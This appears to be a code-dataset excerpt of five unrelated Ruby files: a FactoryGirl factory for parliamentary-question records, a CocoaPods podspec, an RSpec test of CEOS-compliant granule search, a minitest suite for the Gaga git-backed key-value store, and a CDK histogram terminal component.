d5f17bd26516ac311ea3d88f15c874cfd9b09e65 | 6,267 | # == Schema Information
#
# Table name: pqs
#
# id :integer not null, primary key
# house_id :integer
# raising_member_id :integer
# tabled_date :datetime
# response_due :datetime
# question :text
# answer :string(255)
# created_at :datetime
# updated_at :datetime
# finance_interest :boolean
# seen_by_finance :boolean default(FALSE)
# uin :string(255)
# member_name :string(255)
# member_constituency :string(255)
# house_name :string(255)
# date_for_answer :date
# registered_interest :boolean
# internal_deadline :datetime
# question_type :string(255)
# minister_id :integer
# policy_minister_id :integer
# progress_id :integer
# draft_answer_received :datetime
# i_will_write_estimate :datetime
# holding_reply :datetime
# preview_url :string(255)
# pod_waiting :datetime
# pod_query :datetime
# pod_clearance :datetime
# transferred :boolean
# question_status :string(255)
# round_robin :boolean
# round_robin_date :datetime
# i_will_write :boolean
# pq_correction_received :boolean
# correction_circulated_to_action_officer :datetime
# pod_query_flag :boolean
# sent_to_policy_minister :datetime
# policy_minister_query :boolean
# policy_minister_to_action_officer :datetime
# policy_minister_returned_by_action_officer :datetime
# resubmitted_to_policy_minister :datetime
# cleared_by_policy_minister :datetime
# sent_to_answering_minister :datetime
# answering_minister_query :boolean
# answering_minister_to_action_officer :datetime
# answering_minister_returned_by_action_officer :datetime
# resubmitted_to_answering_minister :datetime
# cleared_by_answering_minister :datetime
# answer_submitted :datetime
# library_deposit :boolean
# pq_withdrawn :datetime
# holding_reply_flag :boolean
# round_robin_guidance_received :datetime
# transfer_out_ogd_id :integer
# transfer_out_date :datetime
# directorate_id :integer
# original_division_id :integer
# transfer_in_ogd_id :integer
# transfer_in_date :datetime
# follow_up_to :string(255)
# state :string(255) default("unassigned")
# state_weight :integer default(0)
#
FactoryGirl.define do
factory :pq do
uin { Faker::Lorem.characters(10) }
house_id 1
raising_member_id 1
tabled_date "2014-05-08 13:45:31"
response_due "2014-05-08 13:45:31"
question { Faker::Lorem.sentence(10) }
answer nil
state PQState::UNASSIGNED
factory :checked_by_finance_pq do
finance_interest false
factory :not_responded_pq do
state PQState::NO_RESPONSE
internal_deadline { Faker::Date.forward(14) }
date_for_answer { Faker::Date.between(internal_deadline, internal_deadline + 7.days)}
minister
ignore do
action_officer { create(:action_officer) }
action_officer_allocated_at { Time.now }
end
after(:create) do |pq, evaluator|
create(:action_officers_pq,
pq: pq,
action_officer: evaluator.action_officer,
created_at: evaluator.action_officer_allocated_at,
updated_at: evaluator.action_officer_allocated_at)
end
end
factory :draft_pending_pq do
state PQState::DRAFT_PENDING
internal_deadline { Faker::Date.forward(14) }
date_for_answer { Faker::Date.between(internal_deadline, internal_deadline + 7.days)}
minister
after(:create) do |pq, _|
pq.action_officers_pqs = [create(:accepted_action_officers_pq, pq: pq)]
end
factory :with_pod_pq do
state PQState::WITH_POD
draft_answer_received { Time.now }
factory :pod_query_pq do
state PQState::POD_QUERY
pod_query_flag true
factory :pod_cleared_pq do
state PQState::POD_CLEARED
pod_clearance { Time.now }
factory :with_minister_pq do
state PQState::WITH_MINISTER
sent_to_answering_minister { Time.now }
factory :ministerial_query_pq do
state PQState::MINISTERIAL_QUERY
answering_minister_query true
end
factory :minister_cleared_pq do
state PQState::MINISTER_CLEARED
cleared_by_answering_minister { Time.now }
end
end
end
end
end
end
end
factory :answered_pq do
state PQState::ANSWERED
end
end
end
| 41.503311 | 93 | 0.494016 |
1a8cb0b1ea3f1ac5039c7d804c3034bd16110d56 | 619 | Pod::Spec.new do |s|
s.name = "OpenClien"
s.version = "0.1.1"
s.summary = "Clien.net 비공식 iOS 라이브러리"
s.homepage = "https://github.com/kewlbear/OpenClien"
s.license = 'Apache 2.0'
s.author = { "Changbeom Ahn" => "[email protected]" }
s.source = { :git => "https://github.com/kewlbear/OpenClien.git", :tag => s.version.to_s }
s.platform = :ios, '7.0'
s.requires_arc = true
s.source_files = 'OpenClien', 'Vendor/GDataXML-HTML'
s.compiler_flags = '-I$(SDKROOT)/usr/include/libxml2'
s.dependency 'GTMNSStringHTMLAdditions'
end
| 36.411765 | 102 | 0.588045 |
011817fbc7d8713af3fa36dfa17c9298b7692d44 | 1,598 | require 'spec_helper'
describe 'granules searches compliance with CEOS Best Practices version 1.2' do
include Rack::Test::Methods
def app
Rails.application
end
it 'unsupported query parameters are dropped from the request per CEOS-BP-009B' do
VCR.use_cassette 'views/granule/ceos_bp_009b', :decode_compressed_response => true, :record => :once do
get '/granules.atom?shortName=AST_L1B&unsupported_query_parameter=testvalue'
assert last_response.ok?
feed = Nokogiri::XML(last_response.body)
assert_equal '3172006', feed.xpath('atom:feed/os:totalResults', 'os' => 'http://a9.com/-/spec/opensearch/1.1/', 'atom' => 'http://www.w3.org/2005/Atom').first.text
assert_equal '10', feed.xpath('atom:feed/os:itemsPerPage', 'os' => 'http://a9.com/-/spec/opensearch/1.1/', 'atom' => 'http://www.w3.org/2005/Atom').first.text
assert_equal '1', feed.xpath('atom:feed/os:startIndex', 'os' => 'http://a9.com/-/spec/opensearch/1.1/', 'atom' => 'http://www.w3.org/2005/Atom').first.text
request_node = feed.xpath('atom:feed/os:Query', 'os' => 'http://a9.com/-/spec/opensearch/1.1/', 'atom' => 'http://www.w3.org/2005/Atom').first
expect(request_node.keys.include?('role')).to be true
expect(request_node.keys.include?('shortName')).to be true
expect(request_node.keys.include?('unsupported_query_parameter')).to be false
expect(request_node.values.include?('request')).to be true
expect(request_node.values.include?('AST_L1B')).to be true
expect(request_node.values.include?('testvalue')).to be false
end
end
end
| 57.071429 | 169 | 0.694618 |
03945d9bd2ca5d184545e3bcb55ffd9b0f56af2a | 5,670 | $:.unshift File.dirname(__FILE__)
require 'helper'
describe Gaga do
@types = {
"String" => ["lady", "gaga"],
"Object" => [{:lady => :gaga}, {:gaga => :ohai}]
}
before do
@store = Gaga.new(:repo => tmp_dir, :branch => :lady)
@master = Gaga.new(:repo => tmp_dir)
end
after do
remove_tmpdir!
end
@types.each do |type, (key, key2)|
it "writes String values to keys" do
@store[key] = "value"
@store[key].must_equal "value"
end
it "writes String values to keys with explicit custom log data" do
@store.set(key, "value", {:message => "Custom message", :author => {:name => 'Test', :email => '[email protected]'} })
@store[key].must_equal "value"
entry = @store.log(key).first
entry['message'].must_equal "Custom message"
entry['author'].must_equal({'name' => 'Test', 'email' => '[email protected]'})
end
it "writes String values to keys with global custom log data" do
store = Gaga.new(
:repo => tmp_dir,
:branch => :lady,
:author => {:name => 'Test', :email => '[email protected]'},
:committer => {:name => 'Test2', :email => '[email protected]'}
)
store.set(key, "value", {:message => "Custom message"})
store[key].must_equal "value"
entry = store.log(key).first
entry['message'].must_equal "Custom message"
entry['author'].must_equal({'name' => 'Test', 'email' => '[email protected]'})
entry['committer'].must_equal({'name' => 'Test2', 'email' => '[email protected]'})
end
it "does not create empty commit" do
grit = Grit::Repo.new(tmp_dir)
initial_count = grit.commit_count
@master.set(key, "value", {:message => 'First commit'})
@master.set(key, "value", {:message => 'Second commit'})
current_count = grit.commit_count
(current_count - initial_count).must_equal 1
@master[key].must_equal "value"
end
it "reads from keys" do
@store[key].must_be_nil
end
it "should default to master when no branch is specified" do
value = 'testing'
@master[key] = value
@master[key].must_equal value
@store[key].must_be_nil
tmp = Gaga.new(:repo => tmp_dir, :branch => :master)
tmp[key].must_equal value
end
it 'guarantess the key is stored in the right branch' do
@store[key] = 'value'
@master[key].must_be_nil
@store[key].must_equal "value"
end
it "returns a list of keys" do
@store[key] = "value"
@store.keys.must_include(key)
end
it "guarantees that a different String value is retrieved" do
value = "value"
@store[key] = value
@store[key].wont_be_same_as(value)
end
it "writes Object values to keys" do
@store[key] = {:foo => :bar}
@store[key].must_equal({:foo => :bar})
end
it "guarantees that a different Object value is retrieved" do
value = {:foo => :bar}
@store[key] = value
@store[key].wont_be_same_as(:foo => :bar)
end
it "returns false from key? if a key is not available" do
@store.key?(key).must_equal false
end
it "returns true from key? if a key is available" do
@store[key] = "value"
@store.key?(key).must_equal true
end
it "removes and return an element with a key from the store via delete if it exists" do
@store[key] = "value"
@store.delete(key).must_equal "value"
@store.key?(key).must_equal false
end
it "removes a key using a custom commit message" do
@store[key] = "value"
@store.delete(key, {:message => "Removed it"}).must_equal "value"
@store.key?(key).must_equal false
entry = @store.log(key).first
entry['message'].must_equal "Removed it"
end
it "returns nil from delete if an element for a key does not exist" do
@store.delete(key).must_be_nil
end
it "removes all keys from the store with clear" do
@store[key] = "value"
@store[key2] = "value2"
@store.clear
@store.key?(key).wont_equal true
@store.key?(key2).wont_equal true
end
it "removes all keys from the store with clear and custom commit message" do
@store[key] = "value"
@store[key2] = "value2"
@store.clear({:message => "All gone"})
@store.key?(key).wont_equal true
@store.key?(key2).wont_equal true
[key, key2].each do |k|
entry = @store.log(k).first
entry['message'].must_equal "All gone"
end
end
it "does not run the block if the #{type} key is available" do
@store[key] = "value"
unaltered = "unaltered"
@store.get(key) { unaltered = "altered" }
unaltered.must_equal "unaltered"
end
it "stores #{key} values with #set" do
@store.set(key, "value")
@store[key].must_equal "value"
end
it 'stores a log message for the key' do
@store[key] = "value"
@store.log(key).first['message'].must_equal("set '#{key}'")
end
end
it 'creates a bare repository' do
bare = Gaga.new(:repo => tmp_bare, :branch => :lady)
File.exists?(File.join(tmp_bare, '.git')).must_equal false
File.exists?(File.join(tmp_bare, 'refs')).must_equal true
bare['key1'] = 'Value 1'
bare['key2'] = 'Value 2'
bare['key3'] = 'Value 3'
bare['key1'].must_equal 'Value 1'
bare['key2'].must_equal 'Value 2'
bare.keys.must_equal %w(key1 key2 key3)
bare.delete('key1')
bare['key1'].must_be_nil
bare.clear
bare.keys.must_equal []
remove_tmpdir!(tmp_bare)
end
end
| 29.226804 | 123 | 0.592593 |
b944832acd6eeb76ef2bd2bcd26ebca38eaa9cec | 1,473 | module RETerm
module Components
# CDK Histogram Widget
class Histogram < Component
include CDKComponent
attr_accessor :value
# Override setter
def value=(v)
component.set(:PERCENT, # view type
CDK::CENTER, # stats pos
Ncurses::A_BOLD, # stats attr
@min, @max, v, # low/high/current
' '.ord | Ncurses::A_REVERSE, # fill ch
true) # box
window.cdk_scr.refresh
end
# Initialize the Histogram component
#
# @param [Hash] args label params
# @option args [String] :title title of Histogram
# @option args [Integer] :min min histogram value
# @option args [Integer] :max max histogram value
def initialize(args={})
super
@title = args[:title] || ""
@min = args[:min] || 0
@max = args[:max] || 10
end
def requested_rows
4
end
def requested_cols
50
end
private
def _component
CDK::HISTOGRAM.new(window.cdk_scr,
2, 1, # x, y
1, -2, # h, w
CDK::HORIZONTAL, # orient
@title,
true, false) # box, shadow
end
end # Histogram
end # module Components
end # module RETerm
| 26.303571 | 61 | 0.467753 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.